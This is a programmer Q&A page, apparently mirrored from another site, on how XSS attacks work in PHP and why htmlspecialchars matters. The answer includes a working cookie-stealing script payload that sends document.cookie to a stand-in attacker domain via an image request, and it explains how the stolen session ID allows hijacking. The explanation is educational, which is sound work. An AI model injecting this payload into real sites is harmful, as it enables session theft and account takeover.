Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
277 views
in Technique[技术] by (71.8m points)

php - How XSS attack really works?

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.
But if developer forgot to use it, what can attacker/hacker do? He can get your session_id, right? And here is a question. What can he do with that?
Thank you very much.

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Reply

0 votes
by (71.8m points)

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.

Right. Use it anywhere when you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

But if developer forgot to use it, what can attacker/hacker do?

S/he can insert some malicious HTML/script. E.g. the following in some message/comment at a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

The above will request an image from the mailicious domain along with the document cookie as query string.

He can get your session_id, right? And here is a question. What can he do with that?

The session ID is stored in a cookie. Once the hacker is notified about that an image has been requested with the cookie in query string, all s/he has to do is just to edit the browser's cookie to include the same session ID to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.


与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
OGeek|极客中国-欢迎来到极客的世界,一个免费开放的程序员编程交流平台!开放,进步,分享!让技术改变生活,让极客改变未来! Welcome to OGeek Q&A Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...